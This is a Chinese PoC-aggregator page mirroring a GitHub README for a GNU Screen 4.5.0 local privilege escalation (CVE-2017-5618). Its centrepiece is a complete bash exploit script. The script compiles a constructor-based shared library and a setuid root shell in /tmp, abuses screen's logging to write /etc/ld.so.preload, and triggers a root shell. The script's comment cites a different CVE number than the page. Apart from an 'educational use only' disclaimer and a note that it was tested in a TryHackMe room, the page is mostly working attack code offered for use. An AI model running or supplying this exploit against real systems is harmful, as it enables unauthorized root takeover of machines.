漏洞平台

POC详情： 773e292b5d31338559b4b380abe6dbb2eb1a3acc

来源

https://github.com/RXDarkee/CVE-2017-5618-Screen-4.5.0-Root

关联漏洞

标题： GNU Screen 权限许可和访问控制问题漏洞 (CVE-2017-5618)
描述：GNU Screen是GNU计划开发的一套用于命令行终端切换的自由软件。该软件支持同时连接多个本地或远程命令行会话，并能够在其间进行自由切换。 GNU Screen 4.5.1之前的版本中存在安全漏洞。本地攻击者可利用该漏洞修改任意文件，获取root权限。

描述

Local privilege escalation exploit for GNU Screen 4.5.0 (CVE-2017-5618). Exploits a vulnerability in the logging feature to hijack shared library loading and gain root access via ld.so.preload manipulation.  Vulnerable: Screen 4.5.0 (SUID) Fixed in: Screen 4.6.0+

介绍

### GNU Screen 4.5.0 Local Privilege Escalation Exploit (CVE-2017-5618)

## 📌 Overview
Local privilege escalation exploit for GNU Screen 4.5.0 that hijacks shared library loading to gain **root access** via `ld.so.preload` manipulation.


## 🔧 Technical Details

Vulnerability: CVE-2017-5618

Type: Shared Library Hijacking via ld.so.preload

Affected: GNU Screen 4.5.0 exclusively

Fixed in: GNU Screen 4.6.0+



## 🎪 The Vulnerability Circus


CVE: 2017-5618 🎯

***The Bug: Screen 4.5.0 creates log files with DANGEROUS permissions***

***The Magic: We trick it into creating /etc/ld.so.preload that loads our malicious library***

***The Payload: Instant root shell! 🐚***



## Script 🗒️

```bash
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
echo "[+] Triggering..."
screen -ls 
/tmp/rootshell
            
```
## Screenshots

> Checking Vulnerable Screen Version.

![Screen version detected](images/screen.png)


> Creating The File And Giving Required Permissions.

![Making](images/making.png)


> Root Access Gained.

![Root](images/root.png)

> Root shell achieved - full system control

## ⚠️ Warning Label


FOR EDUCATIONAL USE ONLY! ⚠️
Don't be a script kiddie - use this only on systems you own or have explicit permission to test.

## Tested On
 TryHackMe KOTH Room - Food

文件快照


 [4.0K]  /data/pocs/773e292b5d31338559b4b380abe6dbb2eb1a3acc
├── [4.0K]  images
│   ├── [ 65K]  making.png
│   ├── [ 52K]  root.png
│   ├── [ 58K]  screen.png
│   └── [   2]  SUP
├── [ 34K]  LICENSE
└── [2.2K]  README.md

1 directory, 6 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。